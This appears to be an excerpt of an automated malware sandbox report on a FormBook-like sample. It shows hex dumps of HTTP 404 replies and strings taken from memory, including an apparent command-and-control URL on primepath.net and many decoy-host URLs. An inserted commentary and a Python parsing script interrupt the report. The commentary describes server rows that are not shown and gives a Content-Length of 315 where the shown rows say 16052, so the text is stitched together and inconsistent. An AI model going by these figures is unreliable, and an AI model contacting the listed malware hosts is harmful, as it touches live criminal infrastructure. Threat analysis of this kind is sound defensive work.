2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:39:12 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:39:14 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 
68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
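The response rows above are the part of the capture an analyst wants to read closely: every request is answered with a 404, but by three different server stacks (a WordPress site on LiteSpeed at primepath.net, plain Apache, nginx), which is consistent with FormBook walking through its list of mostly decoy hosts. The report flattens each response into one run-together line and cuts the gzip bodies short, so the framing has to be recovered before anything can be compared. The script below is an added example, not code from the report or from Joe Sandbox; its three sample rows are constructed to mirror the Apache, nginx and LiteSpeed rows above (the LiteSpeed body is gzip-compressed in the script and can be truncated to reproduce the cut captures), and the header-name list used to re-split the blob is this example's own choice:

```python
"""Re-split the report's flattened HTTP response rows and check body framing.
Added example (not from the report or Joe Sandbox); sample rows are constructed
below to mirror the Apache, nginx and LiteSpeed rows on the page."""
import gzip
import re
import zlib

# Header names used by the rows on the page. With the CRLFs gone, the header
# blob is re-split wherever one of these names starts a field (constructed
# list; extend it if a row carries a header that is not listed here).
_HEADER_NAMES = [
    "connection", "content-encoding", "content-length", "content-type",
    "cache-control", "date", "expires", "link", "server",
    "transfer-encoding", "vary", "x-powered-by",
]
_HEADER_SPLIT = re.compile(
    r"(?=(?:%s): )" % "|".join(re.escape(n) for n in _HEADER_NAMES), re.I)


def parse_row(row: str) -> dict:
    """Split one row into status line, header dict, raw body bytes, ascii view."""
    detected = row.partition("HTTP traffic detected: ")[2]
    head, _, tail = detected.partition("Data Raw: ")
    raw_hex, _, ascii_text = tail.partition(" Data Ascii: ")
    fields = _HEADER_SPLIT.split(head)
    headers = {}
    for field in fields[1:]:
        name, _, value = field.partition(": ")
        headers[name.lower()] = value.strip()
    return {"status": fields[0].strip(), "headers": headers,
            "raw": bytes.fromhex(raw_hex), "ascii": ascii_text}


def check_framing(headers: dict, raw: bytes) -> dict:
    """Compare the captured bytes with the framing the headers declare."""
    info = {"mode": "none", "declared": None, "captured": len(raw),
            "complete": None, "body": raw}
    if "chunked" in headers.get("transfer-encoding", "").lower():
        size_line, sep, rest = raw.partition(b"\r\n")
        if not sep:                              # even the size line is cut
            info.update(mode="chunked", complete=False)
        else:                                    # first chunk only; ';ext' ignored
            size = int(size_line.split(b";")[0].decode(), 16)
            info.update(mode="chunked", declared=size, body=rest[:size],
                        captured=min(len(rest), size),
                        complete=len(rest) >= size + 2)   # data + its CRLF
    elif "content-length" in headers:
        size = int(headers["content-length"])
        info.update(mode="content-length", declared=size, body=raw[:size],
                    complete=len(raw) >= size)
    body = info["body"]
    info["gzip"] = body[:2] == b"\x1f\x8b"
    # decompressobj yields whatever a truncated stream still contains, no error
    info["text"] = (zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(body)
                    if info["gzip"] else body)
    return info


def analyze(row: str) -> dict:
    parsed = parse_row(row)
    parsed["framing"] = check_framing(parsed["headers"], parsed["raw"])
    return parsed


def flatten_row(status: str, headers: list, raw: bytes) -> str:
    """Emit a row in the report's run-together form (sample construction only)."""
    head = status + "".join(f"{n}: {v}" for n, v in headers)
    printable = "".join(chr(b) for b in raw if 32 <= b < 127)
    return (f"Source: global trafficHTTP traffic detected: {head}"
            f"Data Raw: {raw.hex(' ')} Data Ascii: {printable}")


# Constructed samples (bodies and headers as on the page; gzip made here).
APACHE_BODY = (
    b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n'
    b"<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n"
    b"<p>The requested URL was not found on this server.</p>\n"
    b"<p>Additionally, a 404 Not Found\nerror was encountered while trying "
    b"to use an ErrorDocument to handle the request.</p>\n</body></html>\n")
APACHE_ROW = flatten_row("HTTP/1.1 404 Not Found", [
    ("Date", "Tue, 11 Mar 2025 01:37:43 GMT"), ("Server", "Apache"),
    ("Content-Length", str(len(APACHE_BODY))), ("Connection", "close"),
    ("Content-Type", "text/html; charset=iso-8859-1")], APACHE_BODY)
NGINX_ROW = flatten_row("HTTP/1.1 404 Not Found", [
    ("Server", "nginx/1.18.0"), ("Date", "Tue, 11 Mar 2025 01:38:56 GMT"),
    ("Transfer-Encoding", "chunked"), ("Connection", "close")], b"0\r\n\r\n")
LITESPEED_HTML = (b"<!DOCTYPE html><html><head><title>Page not found</title>"
                  b"</head><body><h1>404</h1><p>Nothing to see on this decoy "
                  b"host; the stealer moves on to the next one.</p></body></html>")


def litespeed_row(truncate_at=None) -> str:
    """Chunked + gzip row like the primepath.net ones; cut short if asked."""
    gz = gzip.compress(LITESPEED_HTML, mtime=0)
    chunk = f"{len(gz):x}\r\n".encode() + gz + b"\r\n0\r\n\r\n"
    if truncate_at is not None:
        chunk = chunk[:truncate_at]
    return flatten_row("HTTP/1.1 404 Not Found", [
        ("Connection", "close"), ("x-powered-by", "PHP/8.2.27"),
        ("expires", "Wed, 11 Jan 1984 05:00:00 GMT"),
        ("cache-control", "no-cache, must-revalidate, max-age=0"),
        ("content-type", "text/html; charset=UTF-8"),
        ("link", '<https://primepath.net/wp-json/>; rel="https://api.w.org/"'),
        ("transfer-encoding", "chunked"), ("content-encoding", "gzip"),
        ("vary", "Accept-Encoding"), ("date", "Tue, 11 Mar 2025 01:37:30 GMT"),
        ("server", "LiteSpeed")], chunk)
```

Run `analyze()` over a row pasted from the report: for the Apache rows the declared Content-Length of 315 matches the 315 bytes the report dumped, so those bodies are complete; for the nginx row the raw `0\r\n\r\n` is a terminal chunk with an empty body; for the LiteSpeed rows the first chunk announces 0x1e5b bytes while the dump holds far fewer, so what the decoy actually served can only be partially inflated from the report and the pcap is needed for the rest.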
                Source: 0t7MXNEfCg.exe, HrovwwypYVlFWB.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: 0t7MXNEfCg.exe, HrovwwypYVlFWB.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: svchost.exe, 00000011.00000002.2873980789.0000018565200000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
                Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.17.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: qmgr.db.17.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: 0t7MXNEfCg.exe, HrovwwypYVlFWB.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
                Source: EhStorAuthn.exe, 0000000F.00000002.3314587680.0000000005CE6000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000003936000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://primepath.net/esw3/?Fvul3V4=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8v
                Source: 0t7MXNEfCg.exe, 00000000.00000002.930848160.000000000359A000.00000004.00000800.00020000.00000000.sdmp, 0t7MXNEfCg.exe, 00000000.00000002.930848160.0000000003151000.00000004.00000800.00020000.00000000.sdmp, HrovwwypYVlFWB.exe, 00000008.00000002.1031277808.0000000003351000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.1community.net
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.2023kuanmeiyingzhibo.net/binding
                Source: nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/qnz1/
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb03
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d8.
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
                Source: nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/bl.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/broadcast.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/index.umd.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/js.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/nc.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/pcmodule.fe363a40.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/pullup.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/realNameAuth.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.js
                Source: EhStorAuthn.exe, 0000000F.00000002.3316573164.0000000008200000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 0000000F.00000002.3314587680.00000000067E4000.00000004.10000000.00040000.00000000.sdmp, nufnwZ9IW.exe, 00000010.00000002.3314093701.0000000004434000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.77zhibo.net/template/news/wandoujia/static/picture/anva-zilv.png
